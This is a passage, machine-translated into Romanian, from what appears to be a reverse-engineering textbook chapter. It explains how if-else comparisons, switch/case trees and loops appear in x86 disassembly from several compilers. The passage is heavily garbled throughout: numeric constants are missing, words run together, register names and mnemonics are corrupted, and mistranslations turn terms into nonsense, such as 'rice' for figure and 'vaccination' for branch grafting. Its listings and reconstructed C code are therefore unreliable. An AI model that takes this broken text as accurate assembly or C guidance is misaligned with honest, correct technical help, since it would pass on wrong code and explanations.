variabilăѵAG A în EDX CMP EDX, [EBP+VAR B];Comparați valoarea variabilei ѵag a cu variabila ѵag JNZ scurt LOC ;Tranziția,dacă ѵag a = var b, altfel tipărirea liniilor ;Prin urmare, codul original al programului arăta astfel :;if (a == b)printf ("a == b");Apăsați apelul Adăugare AAB;"A == B" PNNTF ESP, LOC :;Cod xref: main+ îj mov eax,[ebp+var a];Încărcăm valoarea variabilei ѵag a în EAX CMP EAX, [EBP+VAR B];Comparați valoarea variabilei ѵag a cuvaloarea variabilei ѵag JZ scurt OS A;Tranziția, dacă var a == var b, altfel - sigiliul liniilor ;Prin urmare,codul original al programului arăta astfel :;if (a! == b) printf ("a! = b");Apăsați apelul Adăugați offset AAB ;"A '=B" PNNTF ESP, LOC A :;Cod xref: main+ bîj mov ecx, [ebp+var a] partea III Identificarea structurilor cheieale limbilor de nivel ridicat;Încărcăm valoarea variabilei ѵag a în CE CMP ECH, [EBP+VAR B];Comparați valoareavariabilei ѵag a cu variabila ѵag JL scurt LOC F;Tranziția, dacă var a = b) printf ("a> = b");Push Offset AAV ;"A> = B" CALL PRINTF ADD ESP, LOC F : C de xref: main+ viteză] mov edx, [ebp+var a];Încărcăm valoarea variabilei var a înEDX CMP EDX, [EBP+VAR B];Comparați valoarea variabilei var a cu variabilă var b ZJG scurt LOC ;Tranziția, dacăvar a> var b, altfel sigiliul liniilor ;Prin urmare, codul de program original arăta astfel:} if (a var b) && (var '= )) ||(var a == var c) && (var c '= )) printf ("ok") Acum ne mai insuflăm altceva dacă și obținem: if (var d i = )printf ("ok") else if ((var a> var b) && (var '= )) ||(var a = = var c) && (var c '= )) printf ("ok") Ei bine,analiza celui de -al doilea arbore este, în general, banal: if (var c == var d) printf ("+++") Așadar, textul inițial alprogramului DizAssembled arăta ca și în lista „Lista Textul inițial restaurat al exemplului dizassembleu int a;U int b;? Int c;? Int d;if (d) printf ("true");Altfel if (((a> b) && (a '= )) || ((a == c) && (c' = )))printf (" k \ n");if (c == d) printf ("+++ \ n");Am definit tipul de variabile A și B ca un integra nesemnat, deoarecerezultatul comparației lor a fost analizat de o echipă JNB condiționată nerușinată Dar tipul de variabile C și D, dinpăcate, nu a putut fi determinat Cu toate acestea, acest lucru nu reduce semnificația faptului că am reușit sătransmitem o condiție dificilă în care nu ar fi de mirare și să ne confundăm fără copaci Optimizarea ramurilor Ceinsiditate - sub steagul de optimizare, faceți fiecare linie de linie de puzzle de cod Să presupunem că ați îndeplinitun cod care arată aproximativ așa cum se arată în lista Reamintim că echipa Setge stabilește ieșirea operanduluila dacă SF și steagurile de stat sunt egale (adică, SF == din), altfel operandul operandului este stabilit la zero ,Listarea Un exemplu de cod confuz creat de optimizarea compilatorului Mov eah, [ѵag a] Hog esh, esh eah, x setge cl și esh, oxffcoo add Ecx, x mov [var z z], ECX la prima vedere Acest fragment este împrumutat de la Un felde fragment împrumutat de la unii un mecanism de protecție viclean, dar, de fapt, nu este așa Înainte de tine esterezultatul compilării următoarei expresii banale Identificarea IF- atunci- else zhniya: if (și ;Acordați o atenție deosebită acestui moment - până la urmă, în textul original;O astfel de operație nu a bătut oastfel de operație!;Mai mult, această tranziție nu duce la apelul funcției printf, adică aceasta;Fragmentul de cod nu afost obținut prin difuzarea directă a unei anumite sucursale de caz, ci;In caz contrar!CMP [EBP+VAR TMP], ;Comparațivaloarea lui ѵAG A cu un Deuce ;„Puncția” evidentă a compilatorului - tocmai am făcut acest lucru;Funcționare și dinacel moment nu s -au schimbat steaguri!JZ scurt LOC F;Trecerea la Call Printf ("A == "), dacă ѵAG A - OK,;Acest cod este obținut în mod clar prin difuzarea ramurilor cazului : printf ("a == ") CMP [EBP+VAR TMP], ;Comparați ѵAG A cu Zero JZ scurt LOC ;Tranziție la apel printf ("a =- "), dacă ѵag a == ;Acest cod esteobținut prin difuzarea cazului : printf ("a == ") CMP [EBP+VAR TMP], PARTEA III Identificarea structurilor cheieale limbilor de nivel ridicat;Comparați ѵag a cu o unitate JZ scurt OS ;Tranziția la apel printf ("a == "), dacăѵag a == ;Acest cod este obținut prin difuzarea cazului : Filiala printf ("A == ") JMP scurt LOC D; tranziție la Call Printf (" implicit ") , Dacă ѵAG A> EMP [EBP+VAR TMP], H; ComparațiѵAG A cu o valoare de x JZ Scurt OS E; tranziție la Call Printf ("A == h"), dacă ѵAG A == x ; Acestcod este obținut prin difuzarea ramurilor CASET OHBBB: printf ("A == BBBI") JMP Short LOC D; Tranziția la apelprintf ("Default") Main+lcîj; // printf ("a == ") push offset aao; "a == " Apel pnntf add esp, jmp ghortloc a; Aceasta este pauza de operator; nu ar fi, ar începe ; toate celelalte ramuri de caz ar fi efectuate,indiferent de ce; valoarea lui ѵag a aparțin! OS :; // printf ("A == ") Push Offset Aal Cal CalL printf addesp, JMP scurt LOC A;Cod xref: principal+ viteză "a == " LOC F :;// printf ("A == ") Push Offset AA Call Printf Add Esp, JMP scurt LOC A;O pauză LOC E :;// printf ("A == h") Push Offset AA H CALL PRINTF ADD ESP, JMP scurt LOC A;Cod xref: main+ îj;"A == ; cod xref: main+ dîj;" a == h "gpava Identificarea comutatorului structurilor - caz - pauză ; * break loc d: // printf (" implicit ") push offsetAdefaultffffff Adăugare ESP , LOC A :; // End Switch Mov Esp, EBP POP EBP; Închideți cadrul stivei Retn Endpprincipal; cod xref: principal+ viteze main+ fîj; "implicit"; cod xref: main+ eîj main+ döh După ce am construit unarbore logic , vom obține o imagine prezentată în Fig Când studiem, este izbitor, în primul rând, condiția a> ,care nu a fost în programul inițial În al doilea rând, nu se poate observa că procesarea cazurilor de ordine areschimbat În același timp, apelurile funcțiilor printf urmează unul după altul strict în funcție de anunțul lor De cecompilatorul este astfel alianțe? Ce se așteaptă să realizeze acest lucru? A> A = A = H printff'a = ");printf("a = = h");printff'a = o "); printff'Default");printff'a = g ');Orez Un exemplu de difuzare a compilatorului deoperator de comutare Microsoft Visual C ++ Scopul cuibului (A> ) este foarte simplu - procesarea consecventă a tuturoroperatorilor de cazuri este extrem de involuntară Ei bine, dacă nu există mai mult de patru sau cinci dintre ele și dacăprogramatorul arată câteva sute de cazuri în Switch?Procesorul le va verifica pe toate și, în același timp, înconformitate cu legea lui Murphy, cazul dorit va fi chiar la sfârșit Iată lemnul și lemnul „compact”, reducându -șiînălțimea În loc de o ramură înfățișată în fig , traducătorul în cazul nostru a construit două, plasând doar numereîn stânga, nu în două mari, ci în dreapta - toate celelalte Datorită acestui fapt, ramura H de la sfârșitul copaculuia fost transferată la începutul său Această metodă de optimizare a căutării valorilor se numește metoda furcii Maidetaliat, acesta va fi luat în considerare în acest capitol, în secțiune „Tăierea copacilor lungi” Modificarea ordiniicomparațiilor - dreapta compilatorului Standardul nu spune nimic în acest sens și fiecare implementare este liberă săfacă așa cum dorește Un alt lucru este instruirea cazurilor (adică, codul la care cazurile transferă gestionarea în cazde adevăr al relației) Aceștia sunt obligați să fie localizați așa cum au fost declarați în program, deoarece în absența această problemă a fost luată în considerare în detaliu în capitolul , „identificarea proiectelor IF - atunci-else” PARTEA III Identificarea structurilor cheie ale limbilor de nivel înalt ale operatorului de pauză, acestea artrebui să fie efectuate strict în modul conceput de programator, deși această posibilitate a unui limbaj este utilizatăextrem de rar Astfel, identificarea operatorului de comutare nu este foarte complicată Dacă, după distrugerea cuibuluinodal și vaccinarea ramurii din dreapta spre stânga (sau invers), obținem un copac echivalent, iar acest copac formeazăo „împletitură” caracteristică - avem de -a face cu un operator de mai multe alegeri sau cu acesta analog Întreagaîntrebare este: avem dreptul de a șterge cuibul, această operație va încălca structura arborelui?Ne uităm - pe ramuradin stânga a cuibului nodal există cuiburi (a == ), (a == ) și (a == ) și în dreapta - (a == x ) Evident, dacă a== x , atunci a! = și a! = !Prin urmare, vaccinarea ramurii drepte la stânga este destul de sigură, iar după oastfel de transformare, arborele ia forma tipică pentru proiectarea comutatorului (Fig ) Orez Truncharea unuiarbore logic, din păcate, o astfel de tehnică de identificare simplă nu funcționează întotdeauna!Dacă exemplul nostrueste compilat de compilatorul Borland C ++ , atunci codul va arăta așa cum se arată în lista !LISTING " Rezultatul compilării exemplului prezentat în Fig , p Utilizarea compilatorului Borland C ++ ;Intsdecl main (int argc, const main proc în apropiere de char ** argv,const char *envp);Date XREF: Date: o Push EBP EBP EBP, ESP;Deschide rama Stack ;Compilatorul pune variabilanoastră în registrul EAX ;Întrucât nu a fost inițializat, să observați acest fapt;Nu asa de usor!Sub eax, ;Reduce EAXpe unitate!Ce ar însemna?;Nu a existat nicio scădere în programul nostru!JB scurt OS ;Dacă EAX a fost deja procesat mai mare, atunci;Această sucursalăfuncționează supusă unui> = && a fig Arborele logic înainte de echilibrare(a) și după (b) poate fi corectat de „înclinare” prin tăierea unei ramuri în două și vaccinarea jumătăților formatecătre un nou cuib care conține o condiție care determină ce ramuri ar trebui căutate de o variabilă comparată comparată De exemplu, ramura din stânga poate conține cuiburi cu valori uniforme, iar cea dreaptă cu cele ciudate Dar acesta esteun criteriu rău, deoarece valorile uniforme și ciudate sunt rareori în egală măsură, iar Skew se formează din nou Estemult mai fiabil să facem acest lucru: luăm cel mai mic dintre toate semnificațiile și îl plasăm în grupul A, apoi luămcea mai mare dintre toate valorile și îl atribuim grupului B Deci repetăm ​​până când sortăm toate valorile existente(Fig , b) Deoarece operatorul plural necesită unicitatea fiecărei valori, adică fiecare număr poate fi găsit în setul(intervalul) valorilor o singură dată, este ușor de arătat că: □ în ambele grupuri va conține un număr egal de numere(În cel mai rău caz, unul dintre grupuri va fi pentru un număr mai mult □ Toate numerele grupului un mai puțin dinnumărul de grup B Prin urmare, este suficient să îndeplinească o singură comparație pentru a determina care dintre celedouă grupuri ar trebui Căutați valori comparate Înălțimea noului arbore va fi + J, unde n este numărul de cuiburi decopaci vechi Activ, dar împărțim ramura copacului în două și adăugăm un nou cuib- de aici este luat de u și + , și (n+ ) este necesar să rotunjim rezultatul divizării în cea mai mare parte Dar totuși multe Cu toate acestea, ceea ce neîmpiedică să rupem fiecare dintre cele două ramuri cu alte două? Acest lucru va reduce înălțimeaCopac de până la decuiburi!În mod similar, sigiliul ulterior va da -* –> -> -> și asta este!Ambalajele din lemn mai densesunt imposibile (gândiți -vă de ce - în cel mai rău caz, construiți copacul în sine) Dar, vedeți, opt cuiburi nu sunt osută!Trecerea completă a unui arbore optimizat va necesita mai puțin de nouă comparații!Aproape toate compilatoarelesunt capabile să „decupreze copacii logici ai operatorului plural - chiar și non -optimizarea!Aceasta creșteproductivitatea, dar complică partea a III -a Identificarea structurilor cheie ale analizei limbilorde nivel ridicat a programului compilat Aruncați o privire din nou la Fig - stânga Un copac dezechilibrat este vizual și intuitiv După echilibrare (arborele drept), devine dificil să -l dai seama Dinfericire, echilibrarea arborelui permite o transformare inversă eficientă Dar înainte de a continua acest lucru,introducem conceptul de nod de echilibrare Nodul de echilibrare nu schimbă logica lucrării arborelui binar și este unnod opțional, singura funcție a cărei este de a scurta lungimea ramurilor Un nod de echilibrare fără a pierdefuncționalitatea unui copac poate fi înlocuit cu oricare dintre ramurile sale Mai mult, fiecare ramură a nodului deechilibrare ar trebui să conțină unul sau mai multe cuiburi Raționament de la urât - dacă toate nodurile arboreluilogic, a căror ramură din dreapta conține unul sau mai multe cuiburi, poate fi înlocuită de această ramură dreaptă fărăpierderea funcționalității lemnului, atunci acest design este operatorul de comutare De ce ramura potrivită?Așadar, laurma urmei, operatorul de alegere multiplă într-o stare „detaliată” reprezintă un lanț de cuiburi conectate de ramuristângi între ele, iar pe dezvoltatorii de caz de dreapta, încercăm să ridicăm toate cuiburile potrivite ramurastângă Dacă acest lucru reușește, avem de-a face cu operatorul la alegere multiplă, altfel cu altceva Luați înconsiderare apelul de echilibrare pe exemplul următorului arbore (Fig , a) Trecând de la ramura inferioară stângă,vom continua să urcăm un copac până când vom întâlni un nod care ține unul sau mai multe cuiburi pe ramura dreaptă Încazul nostru, acesta este un nod (A> ) A se vedea: Dacă acest nod este înlocuit cu cuiburi (a == ) și (a == ), atuncifuncționalitatea arborelui nu va fi încălcată (Fig , b) În mod similar, nodul (a> ) poate fi înlocuit fără durerecu cuiburi (a> b), (a == b), (a == ) și (a == ) și nodul (a> ), La rândul său, - cuiburi (a == ), (a == bbb)și (a == ) Drept urmare, se formează o acțiune clasică de comutare, în care operatorul plural este recunoscut laprima vedere (Fig , c) și> c) Toate nodurile de echilibrare au primit un copac format dintr -o ramură, atunciacesta este comutatorul = a/= \; = operator?Dacă nodul poate fi înlocuit cu ramura dreaptă fără a pierdefuncționalitatea arborelui, atunci nodul este orezul de echilibrare Apelul echilibrării arborelui logic al GPAV Identificarea Switch Structs - CASE - Break Cazuri complexe de echilibrare sau optimizare aechilibrării pentru a reduce înălțimea arborelui echilibrat Stivul pentru a înlocui cuiburile existente cu nodurile deechilibrare Luați în considerare un exemplu prezentat în Fig Pentru a reduce înălțimea arborelui, traducătorul îlrupe în două jumătăți - există cuiburi cu valori mai mici sau egale cu stânga și toate celelalte din dreapta S -ar păreacă pe ramura dreaptă a nodului (a> ) cuibul (a == ) ar trebui să atârne, dar nu!Aici vedem un nod (a> ), la carecazul-care este atașat la ramura stângă: !De fapt, totul este destul de logic - dacă (a> ) și!(A> ), apoi a == !Esteușor de observat că nodul (a> ) este conectat rigid cu nodul (a> ) și funcționează un cuplu cu acesta din urmă Nuputeți arunca unul dintre ei fără a încălca performanța celuilalt!Este imposibil să convertiți echilibrarea unui copacîn conformitate cu algoritmul descris mai sus, fără a -i deteriora funcționalitatea!De aici poate fi o opinie că nu avemdeloc să ne ocupăm de un operator plural, ci cu altceva Pentru a risipi această amăgire, va trebui să faceți o serie depași suplimentari Primul-Derevy-ul de comutare are ca toate dezvoltatorii de caz să fie întotdeauna pe ramurapotrivită Ne uităm-este posibil să ne transformăm arborele, astfel încât tăietorul de caz: să fie pe ramura stângă anodului de echilibrare?Da, acest lucru se poate face prin înlocuirea (a> ) cu (a ) absolut lipsit de sens Astfel, putem elimina în siguranță din arborele logic toate cuiburile cu condițiicare nu se referă la variabila comparată (variabilă a cuibului de rădăcină) Bun și dacă programatorul „lipit” în caz Manipulatori de ramificare în ceea ce privește variabila comparată?!Se dovedește că acest lucru nu va fi dificil deanalizat!Ramurile „navigate” sunt recunoscute și tăiate elementare fie ca exces, fie ca niciodată De exemplu, dacăatașați un cuib (a> ) la ramura dreaptă a cuibului (a == ), atunci acesta poate fi eliminat ca nu transportă nicioinformație în sine Dacă atașați cuibul (a == ) la ramura dreaptă a aceluiași cuib, atunci poate fi îndepărtat caniciodată efectuat - până la urmă, dacă a == z, atunci evident A!= !Capitolul Identificarea ciclurilor de cicluri -singura (cu excepția Coto) proiectarea limbilor de nivel înalt care are o legătură „înapoi”, adică în domeniul adreselormai tinere Toate celelalte tipuri de sucursale - indiferent dacă este dacă - altfel sau operatorul de selecție înmulțitde comutator, sunt întotdeauna direcționate în zona adreselor senior Drept urmare, arborele logic care înfățișeazăciclul este atât de caracteristic încât este ușor recunoscut la prima vedere Există trei tipuri principale de ciclu:cicluri cu starea la început (Fig , a), cicluri cu o afecțiune la sfârșit (Fig , B) și cicluri cu o afecțiunela mijloc (Fig , c) Ciclurile combinate au mai multe condiții în puncte diferite, de exemplu, la început și lasfârșit în același timp Începutul ciclului I condiție^ I Operator Operator Începutul ciclului StartOperatorul Ciclului Operator Operator USL & VEE Operator Operator N care efectuează sfârșitul operatorului deciclu n Efectuați operator de ciclu final al ciclului final n orez de tranziție crontent Opțiuni pentru structuraarborelui logic al ciclului În rândul său, condițiile sunt de două tipuri: condițiile pentru finalizarea ciclului șicondițiile pentru continuarea ciclului În primul caz, dacă condiția este adevărată, atunci există o tranziție lasfârșitul ciclului, altfel ciclul continuă să fie executat În cel de -al doilea caz, dacă condiția pentru continuareaciclului este falsă, atunci există o tranziție la sfârșitul ciclului, altfel executarea ciclului continuă Este ușor dearătat că condițiile pentru continuarea ciclului sunt condiții de finalizare inversate Astfel, din parteatraducătorului, suportul pentru condițiile de același tip este suficient Într -adevăr, în timp ce, fac și pentruciclurile lingvistice, acestea lucrează exclusiv cu condițiile pentru continuarea ciclului Operatorul Whila Pascal, deasemenea, GPAV Identificarea ciclurilor (condițiapentru continuarea ciclului, iar excepția este doar operatorul repetat-tortil, așteptând îndeplinirea stăriiciclului Ciclurile cu o precondiție în limbile C și suportul Pascal al ciclurilor cu afecțiunea la început (cunoscută șisub denumirea de cicluri cu o presupunere) sunt asigurate de operatorul (condiția), unde starea este o condiție pentrucontinuarea ciclului Astfel, în timp ce ciclul (a ) rămâne adevărată Cutoate acestea, traducătorul, dacă dorește, poate inversa condiția pentru continuarea ciclului, transformându -l într -ocondiție pentru finalizarea ciclului Pe platforma Intel x , un astfel de truc economisește de la una la două comenziale mașinii Luați în considerare exemplul dat în lista , unde ciclul este dat în condiția finalizării și în dreapta- cu condiția de continuare După cum puteți vedea, ciclul cu condiția de completare a unei comenzi este mai scurt Prinurmare, aproape toate compilatoarele, chiar și non -optimizarea, generează întotdeauna prima opțiune În același timp,unii, în special compilatorii avansați, pot transforma chiar și ciclurile cu o precondiție în cicluri și mai eficiente,cu afecțiunea la sfârșit, pe care o vom lua în considerare puțin mai târziu, în secțiunea „Cicluri cu un post -core” LLISTARE, un exemplu al ciclului cu starea de finalizare a ciclului (opțiunea ) și un exemplu al aceluiași ciclu, dar cucondiția de a continua ciclul (opțiunea ) Opțiunea Opțiunea În timp ce: SMR A, SMR A, JAE END JB CONTINUAREINC și JMP END JMP în timp ce continuă: End: Inc A JMP în timp ce sfârșitul: Curățarea cu condiția de condiție nu poatefi afișată direct în timpul operatorului Apropo, începătorii uită adesea de asta, făcând greșeala „ceea ce văd,scriu”;În timp ce (a> = ) a + + Cu această afecțiune, acest ciclu nu va fi deloc finalizat!Dar cum să îndeplineștiinversarea condițiilor și, în același timp, garantat pentru a preveni greșelile?S -ar părea că ar putea fi mai ușor -dar cereți unui hacker familiar să numească o operație, opusul „mai mult” Poate fi foarte bine (chiar și cu siguranță!),Răspunsul va fi „Mai puțin” Dar nu, - răspunsul corect este „mai puțin sau egal” În tabel poate fi găsită o listăcompletă a operațiunilor inverse ale relațiilor Tabelul Operații de operații inversă Operare logică Operațiunelogică inversă == i = t = ==> = = , b &&b || b = ;Dacă (a == ) Celebra carte „The With Progiamming Language”, scrisă de Brian Kernighan și Dennis Ritchie (Dennis Ritchie)Prima ediție a acestei cărți (adesea numită „Vechiul Testament”) a apărut în Și a fost prima carte pe scară largăde limbaj de programare cu a doua ediție, cunoscută sub numele de Noul Testament, a fost publicată în , a fostprocesată ținând cont de toate modificările aduse la noul standard ANSI din ediția a doua a fost tradusă în Peste delimbi, inclusiv rusul (B Kernigan, Drichi, „Programarea C” - Williams, ) Avertisment W Utilizarea expresiei nuare sens un șir conține o expresie care nu efectuează acțiuni utile în exemplul „I I = ( , ), ” Expresia „ ”, acestmesaj este, de asemenea, generat pentru comparații fără sens ” Partea III Identificarea structurilor cheie alelimbilor de nivel înalt JNZ JMP WOO Repetă repetare; tranziție la„ O altă opțiune ”, dacă a '= ; Aproape toate limbilela un nivel înalt permit utilizarea componentelor Cu toate acestea, componentele pot fi înfățișate schematic sub formaunei „casete negre” abstracte cu intrarea/ieșirea și arborele binar logic din interior Construcția și reconstrucțialogică Copacii au fost examinați în detaliu în capitolul , „Dacă - atunci - altfel”, nu suntem interesați decondițiile în sine, ci de organizație Ciclurile Ciclurile investite sunt destul de naturale, ciclurile pot fiinvestite S -ar părea ce probleme poate apărea? Începutul fiecărui ciclu este determinat în mod fiabilSunt la legăturaîncrucișată direcționată în jos Sfârșitul ciclului este o tranziție condițională sau necondiționată la începutulsău Fiecare ciclu are un singur început și un singur capăt Mai mult decât atât, ciclurile nu se pot intersecta, adicădacă începutul unui alt ciclu are loc între început și sfârșitul unui ciclu, atunci acest ciclu este cuibărit Dar nutotul este atât de simplu: există două capcane În primul rând: continuați operatorul în cicluri cu o presupunere, a douaeste condițiile dificile pentru continuarea ciclului cu post -fluid Luați în considerare mai detaliat Întrucâtoperatorul continuu în cicluri cu presupunerea (lista ) este difuzat într -o tranziție necondiționată direcționată„UP”, acesta devine aproape indistinguibil de la sfârșitul ciclului (lista ) : Listarea Un exemplu de operatorcontinuu într -un ciclu cu while (condiție) {if (condiție ) continuă;Rezultatul difuzării acestui exemplu este dat înlista ;Listarea Rezultatul tranzacției operatorului continuu în ciclu cu presupunerea stării de ieșire dinciclu ' main () ParteaIII Identificarea structurilor cheie ale limbilor de nivel înalt int a = ;În timp ce (a ++ );Rezultatul compilării acestuiexemplu de către compilatorul Microsoft Visual C ++ cu setările implicite ar trebui să arate așa cum se arată înlista Listarea Rezultatul difuzării exemplului din lista de către compilator;Microsoft Visual C ++ cu setări implicite „Am proc aproape;C DE XREF: START+AFIP VAR A = DWORD PTR - PUSHH EBP MOV EBP, ESP;Deschide ramaStack Împinge ECX;Rezervăm memorie pentru o variabilă locală mov [ebp+var a], ;Am introdus o variabilă ѵag a valoare x OS V :;C DE XREF: Main + > H;Cross Link, regizat în jos, sugerează că acesta esteînceputul;ciclu Desigur: Deoarece legătura încrucișată este direcționată în jos, atunci;Tranziția care se referă laaceastă adresă va fi trimisă până la MOV EAX, [EBP+VAR A];Încărcăm valoarea variabilei ѵag a în EAX Mov ech,[ebp+var a];Încărcăm valoarea variabilei ѵag a în CE ;(Compilator cu viziune scurtă -Unul ar putea face mai scurt :; Mo-eh, EAH) Adăugați ES, ;Creștem Ech pe unitate mov [ebp+var a], esh;Actualizăm ѵAG A CMP EAH, OAH;Comparați valoareaveche (pentru a actualiza) a variabilei;ѵag a cu numărul de OHA JGE scurt LOC B;Dacă ѵag a> = ok - sari „înainte”,direct pentru instrucțiuni;O tranziție necondiționată direcționată „înapoi” GPAVA Identificarea ciclurilor ;Odată„înapoi”, înseamnă că acesta este un ciclu și, deoarece starea de plecare;Ciclul este verificat la început, atunciacesta este un ciclu cu o presupunere ;Pentru a -l afișa până la ciclu, este necesar să inversați condiția;Ieșiți dinciclu în condiții de continuare a ciclului (adică înlocuirea> = cu ,atunci trecerea la începutul ciclului ;Deoarece starea este situată la sfârșitul corpului ciclului, acest ciclu este DO:- do Printf ("Cycle Operator do \ n");While (-a> );// pentru a crește lizibilitatea textului DizAssembler esterecomandat;// Înlocuiți prefixele OS la începutul ciclului în timp ce și faceți (repetați) b;// cicluri cu pre- și,respectiv, postcryption Partea III Identificarea structurilor cheie ale limbilor de nivel înalt,mișc esp, ebp pop ebp;Închideți rama lui Stack Retn Main Endp va obține un rezultat complet diferit dacă activațioptimizarea Vom compila același exemplu cu cheia /O (optimizare maximă) și vom analiza rezultatul emis de compilator(listarea ) Listarea Rezultatul difuzării exemplului și „Listarea de către comperatorul MicrosoftVisual C ++ cu optimizarea maximă a PROC -ului principal aproape Cod xref: start+afj, p pushh esi push edi;Salvămregistrele în stivă Mov ESI, ;Alocăm valoarea ESI x ;Atenție - Aruncați o privire la codul sursă - nu una dintrevariabile;A avut un astfel de sens!Mov edi, Oah;Alocăm EDI valoarea OHA Da, aceasta este o constantă pentruverificare;Condiții pentru părăsirea ciclului OS C : Cod xref: main+ldj, j;Judecând după legătura încrucișatădirecționată în jos, acesta este Cycle Push Offset Aoperatorciklaw;Operator "whilexn" apelator " pnntf adaugă esp, ;Printf ("operator de ciclu Wilexn);Corpul în timp ce ciclul?(Bewildered SO);Așteptați, așteptați și unde estepresupunerea? dec edi;Reduceți EDI cu unul INC ESI;Creștem ESI cu unul Test edi, edi;Verificăm EDI pentru egalitateazero Pentru scurte OS C;Trecerea la începutul ciclului până la EDI = ;Deci (gânditor) Compilatorul dinimpulsul de optimizare s -a transformat;un ciclu ineficient, cu o presupunere a unui ciclu mai compact și mai rapid;Cupost -cream Avea dreptul să facă acest lucru?De ce nu?!;După analizarea codului, compilatorul și -a dat seama că acestciclu este efectuat;Cel puțin o dată, prin urmare, ajustarea condiției;Continuări, verificarea acestuia poate fi dusăpână la sfârșitul ciclului De aceea;Valoarea inițială a ciclului variabil este egală cu unul, și nu zero 'GPAV Identificarea ciclurilor ;Adică, în timp ce ((int a = ) );Adevărat, înnorat și confuz?Atunci, apoi încearcă să scapi;Una dintre cele două variabile Acest lucru este cuadevărat posibil, pentru că ei;modificat sincron și var edi = ohv - var esi;OK, efectuăm o substituție :;Var eSI = ;var edi = ohv - var esi;(== ohha;);do {;; vopsea ("Operatorul ciclului în timp ce \ n");var edi ;var esi ++; Lullllll;Îngeneral, reducem acest lucru, deoarece var edi este deja exprimat prin var esi ;} While ((ohh - var esi)> );(==var esi> ohv);Ce, ceva este deja semnificativ :;Var eSI = ;var edi == ohha;;do {;;- printf ("operator de ciclu în timpce \ n");var esi ++;;} While (var esi> oxb);Vă puteți opri acolo sau puteți merge mai departe transformând;Un ciclu cuun post -belert într -un ciclu mai vizual cu o precondiție ;var eSI = ;var edi == ohha; LJ Partea III Identificarea structurilor cheie ale limbilor de nivel ridicat;Cross Link, regizat în jos, spune asta;căacesta este începutul ciclului ;// Niciuna - înseamnă că acesta este ciclul DO Push ofset aoperatorciklad;„Operatorul deciclu do \ n” CALL PRRNTF ADD ESP, ;Printf ("Cycle Operator do \ n");Deci;Reduceți var esi Test ESI, ESI;VerificareaESI la zero JG scurt LOC F;Continuați ciclul în timp ce var esi> ;O K Acest ciclu este ușor și Ușor afișat pe limbaj cu :;Do printf ("Cycle Operator do \ n");While ( var esi> ) pop edi pop esi;Restaurațiregistrele salvate ENDP -ul principal este oarecum diferit optimizat de compilatorul Borland C ++ X (lista ) Listarea , Optimizarea ciclurilor cu compilatorul Borland C ++ X Main Proc în apropiere;Date Xref: Date: - Push EBP EBP EBP, ESP;Deschide rama Stack Împingeți EBX;Salvăm EBP în stivă Xor EBX, EBX;Alocăm valoarea EBXregistrului EBX ;Cât de ușor este să ghicești, Esh este „A” JMP scurt LOC F;Un salt necondiționat în jos Foarteasemănător cu ciclul pentru OS :;Cod xref: main+ > h;Cross Link direcționat în jos - înseamnă că acesta esteînceputul ciclului Push ofset aoperatorciklaw;„Operatorul din timp \ n” apelează printf cpava Identificareaciclurilor ROR ECH;Operator printf ("wimxn") LOC F : C dexref: main+ > h;Dar primul salt a fost regizat aici ;Să vedem: Ce este?Mov eax, ebx;Copierea EVOS în EAX INCEBX;Creșterea EVOS CMP eah, Oah;Comparația EAX cu sensul OHA ) scurt S ;Trecerea la începutul ciclului, dacăeah ;Do printf ("Cycle Operator do \ n");While ( var ebx> ) xor eax,eax;Return pop ebx pop ebp;Restaurați registrele salvate Valoarea principală retn ENDP În forma sa, este dificil sănu cazi de pe scaun ;Cod xref: sub c+ lj Partea III Identificarea structurilor cheie alelimbilor de nivel înalt Compilatoarele rămase generează un cod similar sau chiar mai primitiv și evident, deci nu levom dezasambla în detaliu, ci doar să descriem pe scurt schemele de difuzare pe care le folosesc Compilatorul liberPascal x se comportă în mod similar cu compilatorul Borland C ++ , plasând întotdeauna starea la sfârșitul cicluluiși începând cu acesta performanța ciclurilor de timp Compilatorul W WATCOM C nu știe cum să convertească ciclurile cu opresupunere în cicluri cu un post-fluid, ca urmare a căreia are o condiție pentru a părăsi ciclul la începutulciclurilor în timp ce și un salt necondiționat se inserează în lor Sfârşit (Clasic!) Compilatorul GCC nu se optimizeazădeloc cu o expunere, generând cel mai non -optim cod (listarea ) Listarea Rezultatul difuzării ciclurilor cuo presupunere folosind compilatorul GCC MOV [EBP+VAR A], ;Atribuirea unei variabile a Mov ESI, ESI;E cod extrem deinteligent OS :;Începutul ciclului MOV EAX, [EBP+VAR A];Încărcarea valorilor EAH ale variabilei ѵag a INC[EBP+VAR A];Crește ѵag a pe unitate CMP eax, ;Comparația EAX cu o valoare de x Jle scurt OS ;Tranziție, dacăeAx = oha Push ofsetaoperatorciklaf;„Cycle Operator pentru \ n” CALL PRINTF ADD ESP, ;Printf ("Operator de ciclu pentru \ n") JMP scurtLOC D;O tranziție necondiționată la începutul ciclului ;Deci, ce avem?;inițializarea variabilei ѵAG A;Tranzițiapentru a verifica starea ciclului !;O creștere variabilă de ѵag a f -Verificarea stării în raport cu ѵag a -;Un salt la ieșire din ciclu, dacă starea esteadevărată-! -!■, Apelați printf!!;Trecerea la începutul ciclului Sfârșitul ciclului - ;Verificareafinalizării, situată la începutul ciclului, indică faptul că;că acesta este un ciclu cu o precondiție, dar îl exprimădirect prin;În timp ce eșuează - tranziția necondiționată în mijlocul ciclului interferează, ocolind;Codul variabilei învariabilă;Cu toate acestea, acest ciclu este afișat cu ușurință de către operatorul de forță, vezi :;for (a = ; a lj push offsetaoperatorciklaf;„Cycle Operator pentru \ n” CALL PRINTF ADD ESP, ;Printf ("Operator al ciclului pentru \ n");Efectuămoperatorul Cycle și fără verificări ;Compilatorul viclean a analizat codul și a realizat că ciclul este executat;celpuțin o dată dec ESI;Reducem contorul, deși în codul sursă al programului suntem IT;!Ei bine, dreapta - dec \ jnz estemult mai scurt;INC \ SMR Reg, const \ jnz xxx Oh și compilatorul este înțelept cine este;a dat dreptul de a schimbaciclul de genul acesta? și foarte simplu - și -a dat seama de asta;Parametrul ciclului din ciclul în sine esteutilizat doar ca contor și nu;Nicio diferență - crește cu fiecare iterație sau;scade JNZ scurt OS ;Trecerea laînceputul ciclului dacă ESI> ;Da, în aparență este tipic;a = oha;Do printf ("Operator de ciclu pentru \ n");In timpce) ;Dacă sunteți mulțumit de lizibilitatea acestei forme de înregistrare - concediu;Este, dar nu: pentru (a = ; a ; a ); maifamiliar decât pentru (a = ; a lo pushh ebp mov ebp, esp; deschideți cadrulfripturii Push EBX; economisim EBX în sticlă Partea III ; atribuim variabila EUSH VARIABILĂ OS :la apel printf pop ecx;Începem ciclul cu execuția corpului său ;OK, Borland și -a dat seama că ciclul este 